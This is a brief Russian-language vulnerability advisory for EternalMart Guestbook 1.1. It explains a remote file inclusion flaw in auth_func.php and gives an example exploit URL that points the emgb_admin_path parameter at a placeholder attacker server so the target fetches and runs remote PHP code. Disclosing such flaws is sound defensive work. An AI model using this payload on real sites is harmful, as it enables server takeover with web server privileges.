Программа: EternalMart Guestbook 1.1 

Уязвимость обнаружена в EternalMart Guestbook. Злонамеренный пользователь может выполнить произвольный PHP код на системе.
Сценарий «auth_func.php» не проверяет местоположение PHP файла, включаемого в переменной «emgb_admin_path». В результате удаленный пользователь может заставить сервер включить и выполнить произвольный PHP код на системе с привилегиями Web сервера. 

Пример/Эксплоит:

/admin/auth.php?emgb_admin_path=http://[evil_server]



Оставить мнение